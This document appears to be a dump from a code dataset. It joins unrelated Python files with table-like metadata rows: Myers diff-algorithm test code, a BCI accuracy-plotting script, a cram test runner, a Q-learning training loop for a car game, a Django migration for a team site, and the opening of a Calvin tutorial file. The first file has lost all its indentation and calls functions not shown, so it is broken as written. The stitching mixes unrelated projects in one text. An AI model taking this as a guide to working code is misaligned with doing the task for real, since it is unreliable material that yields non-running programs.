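# Myers' paper, A = 'abcabba' and B = 'cbabac', needs D = 5 edits.
def _myers_length_usage_sketch():
    return myers_diff_length_original_page_6(list('abcabba'), list('cbabac'))  # -> 5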
def myers_diff_length_optimize_y_variant(old_sequence, new_sequence):
"""
This function is a variant of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This version optimizes the variable y instead of x.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V = [None] * (2 * MAX + 2)
V[-1] = 0
for D in range(0, MAX + 1):
for k in range(-D, D + 1, 2):
if k == D or k != -D and V[k - 1] > V[k + 1]:
y = V[k - 1]
else:
y = V[k + 1] + 1
x = y + k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k] = y
if x >= N and y >= M:
return D
def generate_alphabet():
"""
This function is used for testing.
"""
alphabet_size = random.randint(1, len(string.ascii_letters))
return [random.choice(string.ascii_letters) for i in range(0, alphabet_size)]
class EditGraph(object):
"""
When testing the myers diff algorithm and its variants, it is meaningful to test by
first constructing an edit graph, and solving for a sequence that would match
that edit graph as closely as possible.
Randomly generating statistically independent sequences won't cover as many cases of
program execution as 'real' sequences that have some intrinsic relationship between
them.
In this class, an 'edit graph' is constructed with random dimensions and filled with
random diagonals. The 'solve sequences' method then attempts to build two sequences
that would have produced this edit graph as closely as possible.
Note that it is not always possible to produce a pair of sequences that would exactly
produce these randomly generated edit graphs because you can draw an 'impossible'
    edit graph where the implied relationships between diagonals would force some squares
    that are not marked as diagonals to in fact be diagonals. The code below simply solves
for the 'equal to' constraints and ignores the 'not equal to' constraint of empty
squares. Therefore, the sequences that get solved for will likely not have exactly
the same edit graph that was created, but at least it will be close and produce
a pair of sequences with an intrinsic relationship between them.
"""
def __init__(self, x, y, diagonal_probability):
self.x = x
self.y = y
self.diagonal_probability = diagonal_probability
self.graph = []
self.make_empty_edit_graph(x, y)
self.add_random_diagonals_to_edit_graph()
def make_empty_edit_graph(self, x, y):
for i in range(0,y):
r = []
for j in range(0,x):
r.append(False)
self.graph.append(r)
def print_edit_graph(self):
for i in range(0, self.y):
r = self.graph[i]
if i == 0:
sys.stdout.write("+")
for j in range(0, len(r)):
sys.stdout.write("-+")
sys.stdout.write("\n")
sys.stdout.write("|")
for j in range(0, len(r)):
if r[j]["is_diagonal"]:
sys.stdout.write("\\|")
else:
sys.stdout.write(" |")
sys.stdout.write("\n")
sys.stdout.write("+")
for j in range(0, len(r)):
sys.stdout.write("-+")
sys.stdout.write("\n")
def solve_edit_graph(self):
# Attempt to assign symbols to the input strings that produced this edit graph.
s1 = []
for i in range(0, self.x):
s1.append({})
s2 = []
for i in range(0, self.y):
s2.append({})
current_symbol = 0
for j in range(0, self.y):
for i in range(0, self.x):
if self.graph[j][i]["is_diagonal"]:
used_symbol = False
points = [{"x": i, "y": j}]
while len(points):
new_points = []
for g in range(0, len(points)):
if not (("has_symbol" in s1[points[g]["x"]]) and ("has_symbol" in s2[points[g]["y"]])):
if self.graph[points[g]["y"]][points[g]["x"]]["is_diagonal"]:
if self.assign_symbol(points[g]["x"], points[g]["y"], s1, s2, current_symbol):
used_symbol = True
if self.assign_symbol(points[g]["x"], points[g]["y"], s1, s2, current_symbol):
used_symbol = True
for k in range(0, self.y):
if self.graph[k][points[g]["x"]]["is_diagonal"] and k != points[g]["y"]:
new_points.append({"x": points[g]["x"], "y": k})
for k in range(0, self.x):
if self.graph[points[g]["y"]][k]["is_diagonal"] and k != points[g]["x"]:
new_points.append({"x": k, "y": points[g]["y"]})
points = new_points
if(len(points) > 0):
used_symbol = True
if used_symbol:
current_symbol = current_symbol + 1
return self.solve_sequences(s1, s2, current_symbol)
def add_random_diagonals_to_edit_graph(self):
for i in range(0, self.y):
for j in range(0, self.x):
if random.randint(0,self.diagonal_probability) == 0:
self.graph[i][j] = {"is_diagonal": True}
else:
self.graph[i][j] = {"is_diagonal": False}
def assign_symbol(self, i, j, s1, s2, current_symbol):
made_assignment = False
if "has_symbol" in s1[i]:
if s1[i]["has_symbol"] != current_symbol:
raise
else:
s1[i]["has_symbol"] = current_symbol
made_assignment = True
if "has_symbol" in s2[j]:
if s2[j]["has_symbol"] != current_symbol:
raise
else:
s2[j]["has_symbol"] = current_symbol
made_assignment = True
return made_assignment
def solve_sequences(self, s1, s2, current_symbol):
r1 = []
r2 = []
for i in range(0, len(s1)):
if "has_symbol" in s1[i]:
r1.append(s1[i]["has_symbol"])
else:
r1.append(current_symbol)
current_symbol = current_symbol + 1
for i in range(0, len(s2)):
if "has_symbol" in s2[i]:
r2.append(s2[i]["has_symbol"])
else:
r2.append(current_symbol)
current_symbol = current_symbol + 1
return r1, r2
def make_random_sequences(size):
choice = random.randint(0,2)
if choice == 0:
# Construct an edit graph, and then build a sequences that matches it as closely as possible
eg = EditGraph(random.randint(0, size), random.randint(0, size), random.randint(1, size))
s1, s2 = eg.solve_edit_graph()
return s1, s2
elif choice == 1:
string_a_size = random.randint(0, size)
string_b_size = random.randint(0, size)
s1 = list(''.join(random.choice(generate_alphabet()) for i in range(string_a_size)))
s2 = list(''.join(random.choice(generate_alphabet()) for i in range(string_b_size)))
return s1, s2
else:
special_cases = [
[
# Both empty
[], []
],
[
# Not empty, empty
[1], []
],
[
# Empty, Not empty
[], [1]
],
[
# Not empty, empty
[1,2], []
],
[
# Empty, Not empty
[], [1,2]
],
[
# Both identical
[1,2,3,4], [1,2,3,4]
],
[
# Both different
[1,2,3,4], [5,6,7,8]
],
[
# Half size of the second
[1,2,3,4], [5,6,7,8,'a','b','c','d']
],
[
# Half size of the first
[5,6,7,8,'a','b','c','d'], [1,2,3,4]
],
[
# 2n + 1 size of the second
[5,6,7,8,'a','b','c','d','e'], [1,2,3,4]
],
[
# 2n + 1 size of the first
[1,2,3,4], [5,6,7,8,'a','b','c','d','e']
],
[
# Odd size, odd size
[5,6,7], [1,2,3]
],
[
# Odd size, even size
[5,6,7], [1,2,3,4]
],
[
# Even size, even size
[5,6,7,8], [1,2,3,4]
],
[
# Even size, odd size
[5,6,7,8], [1,2,3]
]
]
case_number = random.randint(0, len(special_cases) -1)
return special_cases[case_number][0], special_cases[case_number][1]
def apply_edit_script(edit_script, s1, s2):
new_sequence = []
i = 0
for e in edit_script:
while e["position_old"] > i:
if i < len(s1):
new_sequence.append(s1[i])
i = i + 1
if e["position_old"] == i:
if e["operation"] == "delete":
i = i + 1
elif e["operation"] == "insert":
new_sequence.append(s2[e["position_new"]])
elif e["operation"] == "change":
new_sequence.append(s2[e["position_new"]])
i = i + 1
else:
# Should not happen
raise
while i < len(s1):
new_sequence.append(s1[i])
i = i + 1
return new_sequence
def get_parts_for_change_region(edit_script, i, ins, dels):
parts = []
# This is the size of the 'changed' region.
square_size = min(len(ins), len(dels))
# These are the inserts and deletes that have been paired up
for n in range(0, square_size):
parts.append({"operation": "change", "position_old": edit_script[dels[n]]["position_old"] ,"position_new": edit_script[ins[n]]["position_new"]})
# These are the leftover inserts, that must be pushed 'square_size' units to the right.
for n in range(square_size, len(ins)):
m = edit_script[ins[n]]
# Adjust the insertion positions so the offsets make sense in the simplified path.
shift_right = square_size - (m["position_old"] - edit_script[i]["position_old"])
p = {"operation": "insert", "position_old": m["position_old"] + shift_right, "position_new": m["position_new"]}
parts.append(p)
# These are the leftover deletes.
for n in range(square_size, len(dels)):
m = edit_script[dels[n]]
parts.append(m)
return parts
def simplify_edit_script(edit_script):
# If we find a contiguous path composed of inserts and deletes, make them into 'changes' so they
# can produce more visually pleasing diffs.
new_edit_script = []
m = len(edit_script)
i = 0
while i < m:
others = []
ins = []
dels = []
last_indx = edit_script[i]["position_old"]
# Follow the path of inserts and deletes
while i + len(ins) + len(dels) < m:
indx = i + len(ins) + len(dels)
edit = edit_script[indx]
if edit["operation"] == "insert" and edit["position_old"] == last_indx:
last_indx = edit["position_old"]
ins.append(indx)
elif edit["operation"] == "delete" and edit["position_old"] == last_indx:
last_indx = edit["position_old"] + 1
dels.append(indx)
else:
if edit["operation"] == "insert" or edit["operation"] == "delete":
pass # Non-contiguous insert or delete.
else: # The current edit is something other than delete or insert, just add it...
others.append(indx)
break
if len(ins) > 0 and len(dels) > 0:
# Do simplify
new_edit_script.extend(get_parts_for_change_region(edit_script, i, ins, dels))
else:
# Add the lone sequence of deletes or inserts
for r in range(0, len(dels)):
new_edit_script.append(edit_script[dels[r]])
for r in range(0, len(ins)):
new_edit_script.append(edit_script[ins[r]])
for r in range(0, len(others)):
new_edit_script.append(edit_script[others[r]])
i += len(ins) + len(dels) + len(others)
return new_edit_script
def compare_sequences(s1, s2):
if len(s1) == len(s2):
for i in range(0, len(s1)):
if s1[i] != s2[i]:
return False
return True
else:
return False
def print_edit_sequence(es, s1, s2):
for e in es:
if e["operation"] == "delete":
print("Delete " + str(s1[e["position_old"]]) + " from s1 at position " + str(e["position_old"]) + " in s1.")
elif e["operation"] == "insert":
print("Insert " + str(s2[e["position_new"]]) + " from s2 before position " + str(e["position_old"]) + " into s1.")
elif e["operation"] == "change":
print("Change " + str(s1[e["position_old"]]) + " from s1 at position " + str(e["position_old"]) + " to be " + str(s2[e["position_new"]]) + " from s2.")
else:
raise
def do_external_diff_test(s1, s2):
echo1 = "echo -en '"+ ("\\\\n".join([str(i) for i in s1])) + "'"
echo2 = "echo -en '"+ ("\\\\n".join([str(i) for i in s2])) + "'"
output1 = os.popen("/bin/bash -c \"../diffutils/original_diff_executable <(" + echo1 + ") <(" + echo2 + ") --minimal\"", 'r').read()
output2 = os.popen("/bin/bash -c \"../diffutils-3.6/src/diff <(" + echo1 + ") <(" + echo2 + ") --minimal\"", 'r').read()
output3 = os.popen("/bin/bash -c \"../original_diff_executable <(" + echo1 + ") <(" + echo2 + ")\"", 'r').read()
output4 = os.popen("/bin/bash -c \"../diffutils-3.6/src/diff <(" + echo1 + ") <(" + echo2 + ")\"", 'r').read()
#print("Echos were " + echo1 + " " + echo2)
if output1 == output2 and output3 == output4:
print("Diff matches.")
else:
print("FAIL! Diff does not match s1=")
assert(0)
def do_test():
s1, s2 = make_random_sequences(random.randint(1,300))
print("Begin test with sequences a=" + str(s1) + " and b=" + str(s2) + "")
# Edit script
minimal_edit_script = diff(s1, s2)
random_edit_script = get_random_edit_script(s1, s2)
reconstructed_minimal_sequence_basic = apply_edit_script(minimal_edit_script, s1, s2)
reconstructed_minimal_sequence_simple = apply_edit_script(simplify_edit_script(minimal_edit_script), s1, s2)
# Random edit scripts encounter cases that the more optimal myers script don't
reconstructed_random_sequence_basic = apply_edit_script(random_edit_script, s1, s2)
reconstructed_random_sequence_simple = apply_edit_script(simplify_edit_script(random_edit_script), s1, s2)
# Pick out only the deletions
only_deletes = [item for item in minimal_edit_script if not item["operation"] == "insert"]
# If we only apply the deletions to the original sequence, this should
# give us the longest common sub-sequence.
reconstructed_lcs_sequence = apply_edit_script(only_deletes, s1, [])
# Longest common subsequence
lcs = longest_common_subsequence(s1, s2)
# Edit script length calculations
optimal_distance = myers_diff_length_original_page_6(s1, s2)
half_memory_distance = myers_diff_length_half_memory(s1, s2)
minab_memory_distance = myers_diff_length_minab_memory(s1, s2)
optimize_y_distance = myers_diff_length_optimize_y_variant(s1, s2)
random_distance = len(random_edit_script)
edit_script_length = len(minimal_edit_script)
# D = (M + N) + L
computed_distance = (len(s1) + len(s2)) - (2 * (len(lcs)))
# Snake finding algorithms
D1, x1, y1, u1, v1 = find_middle_snake_less_memory(s1, len(s1), s2, len(s2))
D2, x2, y2, u2, v2 = find_middle_snake_myers_original(s1, len(s1), s2, len(s2))
#do_external_diff_test(s1, s2)
if not (
D1 == D2 and
x1 == x2 and
y1 == y2 and
u1 == u2 and
v1 == v2 and
reconstructed_lcs_sequence == lcs and
optimal_distance == edit_script_length and
optimal_distance == computed_distance and
optimal_distance == half_memory_distance and
optimal_distance == minab_memory_distance and
optimal_distance == optimize_y_distance and
random_distance >= optimal_distance and
compare_sequences(reconstructed_minimal_sequence_basic, s2) and
compare_sequences(reconstructed_minimal_sequence_simple, s2) and
compare_sequences(reconstructed_random_sequence_basic, s2) and
compare_sequences(reconstructed_random_sequence_simple, s2)
):
print("FAILURE!!!!")
print("Sequences are a=" + str(s1) + " and b=" + str(s2) + "")
print("optimal D: " + str(optimal_distance))
print("computed D: " + str(computed_distance))
print("half memory D: " + str(half_memory_distance))
print("min A,B memory D: " + str(minab_memory_distance))
print("Optimize y D: " + str(optimize_y_distance))
print("random D: " + str(random_distance))
print("reconstructed_minimal_sequence_basic: " + str(reconstructed_minimal_sequence_basic))
print("reconstructed_minimal_sequence_simple: " + str(reconstructed_minimal_sequence_simple))
print("reconstructed_random_sequence_basic: " + str(reconstructed_random_sequence_basic))
print("reconstructed_random_sequence_simple: " + str(reconstructed_random_sequence_simple))
print("edit_script_length: " + str(edit_script_length))
print("Less memory Snake: D=" + str(D1) + " x1=" + str(x1) + " y1=" + str(y1) + " u1=" + str(u1) + " v1=" + str(v1))
print("Myers original Snake: D=" + str(D2) + " x2=" + str(x2) + " y2=" + str(y2) + " u2=" + str(u2) + " v2=" + str(v2))
sys.stdout.flush()
assert(0)
else:
print("Pass")
#random.seed(123) # For deterministic test result comparisons.
i = 0
while True:
do_test()
i=i+1
| apache-2.0 | 4,795,845,030,016,554,000 | 43.878099 | 163 | 0.560103 | false |
lol/BCI-BO-old | plot_iii3b_old.py | 1 | 4787 | import numpy as np
import matplotlib.pyplot as plt
import math
from pylab import figure
from my_plotter import *
import os
import sys
sys.path.append('./BCI_Framework')
import Main
import Single_Job_runner as SJR
import os
import re
if __name__ == '__main__':
bciciv1 = Main.Main('BCI_Framework','BCICIII3b','RANDOM_FOREST', 'BP', 'ALL', -1, 'python')
res_path = bciciv1.config.configuration['results_opt_path_str']
classifiers_dict = {'Boosting':0, 'LogisticRegression':1, 'RANDOM_FOREST':2,'SVM':3, 'LDA':4, 'QDA':5 , 'MLP':6}
features_dict = {'BP':0, 'logbp':1, 'wackerman':2, 'morlet':3, 'AR':4}
results = np.zeros((len(classifiers_dict),len(features_dict), bciciv1.config.configuration["number_of_subjects"]))
discarded_periods = np.empty((len(classifiers_dict),len(features_dict), bciciv1.config.configuration["number_of_subjects"]), dtype='S10')
subjects_dict = {}
for ind, subj in enumerate(bciciv1.config.configuration["subject_names_str"]):
subjects_dict.update({subj:ind})
for dirname, dirnames, filenames in os.walk(res_path):
# for subdirname in dirnames:
# fold_name = os.path.join(dirname, subdirname)
# print fold_name
for filename in filenames:
# slash_indices = re.search('0', filename)
if filename[-4:] != '.pkl':
file_name = os.path.join(dirname, filename)
backslash_indices = [m.start() for m in re.finditer("\\\\", file_name)]
underline_indices = [m.start() for m in re.finditer("_", file_name)]
feature_ext_name = file_name[backslash_indices[-2]+1:backslash_indices[-1]]
classifier_name = file_name[backslash_indices[-3]+1:backslash_indices[-2]]
subj = file_name[underline_indices[-1]+1:-4]
# print feature_ext_name, classifier_name, subj
npzfile = np.load(file_name)
error = npzfile['error']
accuracy = 100 - error*100
results[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = accuracy
discarded_periods[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = file_name[backslash_indices[-1]+1:underline_indices[2]]
# with open(file_name,'r') as my_file:
#
# error = float(my_file.readline())
# accuracy = 100 - error*100
# results[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = accuracy
## print file_name[backslash_indices[-1]+1:underline_indices[1]]
# discarded_periods[classifiers_dict[classifier_name], features_dict[feature_ext_name],subjects_dict[subj]] = file_name[backslash_indices[-1]+1:underline_indices[2]]
#
# print backslash_indices
for feature in features_dict.keys():
f_ind = features_dict[feature]
feature_ext_y = []
labels = []
for subject in subjects_dict.keys():
subj_ind = subjects_dict[subject]
feature_ext_y.append(tuple(results[:,f_ind,subj_ind]))
labels.append(feature + '_' + subject)
# plotter( feature_ext_y, math.floor(np.min(feature_ext_y) - 1), math.floor(np.max(feature_ext_y) + 1), feature, labels)
plotter( feature_ext_y, 46, 97, feature, labels)
for subject in subjects_dict.keys():
for feature in features_dict.keys():
print subject, feature, discarded_periods[:, features_dict[feature],subjects_dict[subject]]
# BP_y = [(72.96,78.62,78.62,76.11,79.25,79.88), (64.45,65.38,65.75,65.00,67.04,66.67), (69.45,71.86,74.26,72.04,69.75,72.6)]
# labels = ['BP_O3','BP_S4','BP_X11']
# plotter( BP_y, 64, 81, 'BP', labels)
# logBP_y = [(74.22,79.25,79.25,77.36,81.77,81.77), (62.23,66.49,66.30,65.38,66.86,66.86), (69.82,72.97,73.15,71.86,74.63,74.63)]
# labels = ['LOGBP_O3','LOGBP_S4','LOGBP_X11']
# plotter( logBP_y, 61, 84, 'logBP', labels)
# wackermann_y = [(56.61,57.24,58.24,54.72,54.72,59.75), (57.97,57.6,59.82,55.75,57.97,58.71), (60,50,57.24,61.49,60.56,62.23)]
# labels = ['wackerman_O3','wackerman_S4','wackerman_X11']
# plotter( wackermann_y, 49, 65, 'wackerman', labels)
# y_RF = [(77.98,76.72,76.72,79.87), (70.74,74.44,80.92,75.18),(75.92,73.51,77.03,78.33),(76.11,77.36,58.5, 54.72), (65,65.38,53.34,55.75), (72.04,71.86,60,61.49)]
# labels = ['BO_RF_O3','BO_RF_S4','BO_RF_X11','RF_grid_search_O3','RF_grid_search_S4','RF_grid_search_X11']
# BO_plotter( y_RF, 49, 83, 'BO_RF', labels)
plt.show() | gpl-3.0 | -2,834,472,925,079,466,500 | 46.88 | 180 | 0.597034 | false |
mpkocher/CramUnit | bin/run_cram_unit.py | 1 | 2616 | #!/usr/bin/env python
import os
import sys
import argparse
import logging
import time
import warnings
import glob
import cram_unit
import cram_unit.crammer as crammer
__version__ = cram_unit.get_version()
log = logging.getLogger()
def _setup_log(level=logging.DEBUG):
handler = logging.StreamHandler(sys.stdout)
str_formatter = '[%(levelname)s] %(asctime)-15s [%(name)s %(funcName)s %(lineno)d] %(message)s'
formatter = logging.Formatter(str_formatter)
handler.setFormatter(formatter)
handler.setLevel(level)
log.addHandler(handler)
log.setLevel(logging.DEBUG)
def _get_parser():
"""Return an instance of ArgumentParser"""
p = argparse.ArgumentParser(version=__version__)
p.add_argument('cram_tests_dir', help="Cram test directory to run.")
p.add_argument("--debug", action="store_true",
help='Turn on debug mode and log to stdout.')
p.add_argument('-x', "--xunit-file", dest='xunit_file', default="cram_xunit.xml",
help="Name of file to write Xunit.xml output to.")
p.add_argument("--cram_prefix", default=None,
help="Prefix that will be added to the test case name. \
(e.g., test_{PREFIX}_{CRAM_FILE})")
p.add_argument("--verbose", action='store_true',
help="pass verbose option to cram")
return p
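# Illustrative invocation (the test directory path below is hypothetical):
#   run_cram_unit.py path/to/cram/tests --xunit-file cram_xunit.xml --debug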
def main():
"""Main Point of Entry"""
p = _get_parser()
args = p.parse_args()
xunit_file = args.xunit_file
debug = args.debug
cram_tests_dir = args.cram_tests_dir
cram_prefix = args.cram_prefix
if not os.path.exists(cram_tests_dir):
msg = "Unable to Find directory {c}".format(c=cram_tests_dir)
sys.stderr.write(msg + "\n")
return -1
if debug:
_setup_log(logging.DEBUG)
    # Hacky kind of interface for now. Just grab all the *.t files from the dir.
cram_files = [os.path.abspath(f) for f in glob.glob("{d}/*.t".format(d=cram_tests_dir))]
if not cram_files:
msg = "Unable to find any *.t files in {x}".format(x=cram_tests_dir)
warnings.warn(msg + "\n")
return 0
#print cram_files
log.info("Found {n} cram files to test {c}".format(n=len(cram_files), c=cram_files))
started_at = time.time()
state = crammer.run(cram_files, xunit_file, prefix=cram_prefix, debug=debug)
run_time = time.time() - started_at
rcode = 0 if state else -1
log.info("Exiting {f} with rcode {r} in {s:.2f} sec.".format(f=os.path.basename(__file__), r=rcode, s=run_time))
return rcode
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | -6,355,580,280,019,088,000 | 27.747253 | 116 | 0.624235 | false |
coreknowledge2016/multi-agent-hrl | learning.py | 1 | 7187 | #from flat_game import carmunk
import carmunk
import numpy as np
import random
import csv
from nn import neural_net, LossHistory
import os.path
import timeit
NUM_INPUT = 6
GAMMA = 0.9 # Forgetting.
TUNING = False # If False, just use arbitrary, pre-selected params.
def train_net(model, params):
filename = params_to_filename(params)
observe = 1000 # Number of frames to observe before training.
epsilon = 1
train_frames = 1000000 # Number of frames to play.
batchSize = params['batchSize']
buffer = params['buffer']
# Just stuff used below.
max_car_distance = 0
car_distance = 0
t = 0
data_collect = []
replay = [] # stores tuples of (S, A, R, S').
loss_log = []
# Create a new game instance.
game_state = carmunk.GameState()
# Get initial state by doing nothing and getting the state.
_, state = game_state.frame_step(2,2)
# Let's time it.
start_time = timeit.default_timer()
# Run the frames.
while t < train_frames:
t += 1
car_distance += 1
# Choose an action.
if random.random() < epsilon or t < observe:
action = np.random.randint(0, 3) # random
action2 = np.random.randint(0, 3)
else:
# Get Q values for each action.
state = state.reshape(1,NUM_INPUT) # reshape
qval = model.predict(state, batch_size=1)
action = (np.argmax(qval)) # best
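            # Note: only the first agent's action is recomputed here; action2
            # keeps whatever value the exploration branch assigned last time.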
# Take action, observe new state and get our treat.
reward, new_state = game_state.frame_step(action, action2)
# Experience replay storage.
replay.append((state, action, action2, reward, new_state))
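        # Keeping a bounded history of transitions and sampling it at random
        # (below) decorrelates consecutive frames before fitting the network.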
# If we're done observing, start training.
if t > observe:
# If we've stored enough in our buffer, pop the oldest.
if len(replay) > buffer:
replay.pop(0)
# Randomly sample our experience replay memory
minibatch = random.sample(replay, batchSize)
# Get training values.
X_train, y_train = process_minibatch(minibatch, model)
# Train the model on this batch.
history = LossHistory()
model.fit(
X_train, y_train, batch_size=batchSize,
nb_epoch=1, verbose=0, callbacks=[history]
)
loss_log.append(history.losses)
# Update the starting state with S'.
state = new_state
# Decrement epsilon over time.
if epsilon > 0.1 and t > observe:
            epsilon -= (1.0/train_frames)
# We died, so update stuff.
if reward == -500:
# Log the car's distance at this T.
data_collect.append([t, car_distance])
# Update max.
if car_distance > max_car_distance:
max_car_distance = car_distance
# Time it.
tot_time = timeit.default_timer() - start_time
fps = car_distance / tot_time
# Output some stuff so we can watch.
print("Max: %d at %d\tepsilon %f\t(%d)\t%f fps" %
(max_car_distance, t, epsilon, car_distance, fps))
# Reset.
car_distance = 0
start_time = timeit.default_timer()
# Save the model every 25,000 frames.
if t % 25000 == 0:
model.save_weights('saved-models/' + filename + '-' +
str(t) + '.h5',
overwrite=True)
print("Saving model %s - %d" % (filename, t))
# Log results after we're done all frames.
log_results(filename, data_collect, loss_log)
def log_results(filename, data_collect, loss_log):
# Save the results to a file so we can graph it later.
with open('results/sonar-frames/learn_data-' + filename + '.csv', 'w') as data_dump:
wr = csv.writer(data_dump)
wr.writerows(data_collect)
with open('results/sonar-frames/loss_data-' + filename + '.csv', 'w') as lf:
wr = csv.writer(lf)
for loss_item in loss_log:
wr.writerow(loss_item)
def process_minibatch(minibatch, model):
"""This does the heavy lifting, aka, the training. It's super jacked."""
X_train = []
y_train = []
# Loop through our batch and create arrays for X and y
# so that we can fit our model at every step.
for memory in minibatch:
# Get stored values.
old_state_m, action_m, action2_m, reward_m, new_state_m = memory
old_state_m = old_state_m.reshape(1,NUM_INPUT)
new_state_m = new_state_m.reshape(1,NUM_INPUT)
#print old_state_m,new_state_m
# Get prediction on old state.
old_qval = model.predict(old_state_m, batch_size=1)
# Get prediction on new state.
newQ = model.predict(new_state_m, batch_size=1)
# Get our best move. I think?
maxQ = np.max(newQ)
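        # Q-learning target: for a non-terminal transition the chosen action's
        # value moves towards reward_m + GAMMA * max_a' Q(s', a'); terminal
        # transitions (reward of -500 here) use the raw reward only.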
y = np.zeros((1, 3))
y[:] = old_qval[:]
# Check for terminal state.
if reward_m != -500: # non-terminal state
update = (reward_m + (GAMMA * maxQ))
else: # terminal state
update = reward_m
# Update the value for the action we took.
y[0][action_m] = update
X_train.append(old_state_m.reshape(NUM_INPUT,))
y_train.append(y.reshape(3,))
X_train = np.array(X_train)
y_train = np.array(y_train)
return X_train, y_train
def params_to_filename(params):
return str(params['nn'][0]) + '-' + str(params['nn'][1]) + '-' + \
str(params['batchSize']) + '-' + str(params['buffer'])
def launch_learn(params):
filename = params_to_filename(params)
print("Trying %s" % filename)
# Make sure we haven't run this one.
if not os.path.isfile('results/sonar-frames/loss_data-' + filename + '.csv'):
# Create file so we don't double test when we run multiple
# instances of the script at the same time.
open('results/sonar-frames/loss_data-' + filename + '.csv', 'a').close()
print("Starting test.")
# Train.
model = neural_net(NUM_INPUT, params['nn'])
train_net(model, params)
else:
print("Already tested.")
if __name__ == "__main__":
if TUNING:
param_list = []
nn_params = [[164, 150], [256, 256],
[512, 512], [1000, 1000]]
batchSizes = [40, 100, 400]
buffers = [10000, 50000]
for nn_param in nn_params:
for batchSize in batchSizes:
for buffer in buffers:
params = {
"batchSize": batchSize,
"buffer": buffer,
"nn": nn_param
}
param_list.append(params)
for param_set in param_list:
launch_learn(param_set)
else:
nn_param = [164, 150]
params = {
"batchSize": 100,
"buffer": 200,
"nn": nn_param
}
model = neural_net(NUM_INPUT, nn_param)
train_net(model, params)
# keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=0)
| mit | 8,669,900,673,622,070,000 | 30.384279 | 88 | 0.554056 | false |
murych/lambdaweb | team/migrations/0001_initial.py | 1 | 6857 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-09 17:59
from __future__ import unicode_literals
import ckeditor_uploader.fields
import colorfield.fields
import django.db.models.deletion
import filebrowser.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=254, unique=True)),
('git_username', models.CharField(max_length=300, verbose_name='Git username')),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True,
help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
related_name='user_set', related_query_name='user', to='auth.Group',
verbose_name='Группа')),
('date_of_birth', models.DateField(blank=True, null=True, verbose_name='Дата рождения')),
('first_name', models.CharField(blank=True, max_length=300, null=True, verbose_name='Имя')),
('last_name', models.CharField(blank=True, max_length=300, null=True, verbose_name='Фамилия')),
('profile_image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Изображения профиля')),
],
options={
'abstract': False,
'verbose_name': 'Участника',
'verbose_name_plural': 'Участники'
},
),
migrations.CreateModel(
name='SocialNetwork',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(
choices=[('mdi-github-circle', 'GitHub'), ('mdi-twitter', 'Twitter'), ('mdi-gmail', 'Mail'),
('mdi-vk', 'Vk'), ('mdi-facebook', 'Facebook')], max_length=300,
verbose_name='Название социальной сети')),
('link', models.CharField(max_length=300, verbose_name='Ссылка на профиль')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'социальных сетей',
'verbose_name_plural': 'социальных сетей'
}
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название')),
('description', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='Описание')),
('members', models.ManyToManyField(to=settings.AUTH_USER_MODEL, verbose_name='Участники проекта')),
('git', models.URLField(blank=True, null=True, verbose_name='Cсылка на Git')),
('image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Главное изображение')),
],
options={
'verbose_name': 'Проект',
'verbose_name_plural': 'Проекты'
}
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название партнера')),
('type_partner', models.CharField(
choices=[('info', 'Информационный'), ('finance', 'Финансовый'), ('general', 'Генеральный')],
max_length=300, verbose_name='Тип партнера')),
('description', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='Описание')),
('address', models.CharField(blank=True, max_length=500, null=True, verbose_name='Адрес')),
('site', models.CharField(max_length=500, verbose_name='Сайт')),
('phone', models.CharField(blank=True, max_length=500, null=True, verbose_name='Телефон')),
('image', filebrowser.fields.FileBrowseField(blank=True, max_length=200, null=True,
verbose_name='Изображение')),
('slug', models.SlugField()),
],
options={
'verbose_name': 'Партнер',
'verbose_name_plural': 'Партнеры',
},
),
migrations.CreateModel(
name='SEO',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('seo_description', models.TextField(verbose_name='SEO Описание')),
('key_words', models.TextField(verbose_name='Ключ слова')),
],
options={
'verbose_name': 'SEO',
'verbose_name_plural': 'SEO',
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300, verbose_name='Название')),
('color', colorfield.fields.ColorField(default='#FF0000', max_length=10)),
],
options={
'verbose_name': 'Тэг',
'verbose_name_plural': 'Тэги',
},
),
]
| mit | 8,095,969,056,012,038,000 | 49.48062 | 160 | 0.534091 | false |
MalmoUniversity-DA366A/calvin-base | calvin/tutorial/dist-1.py | 1 | 1306 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
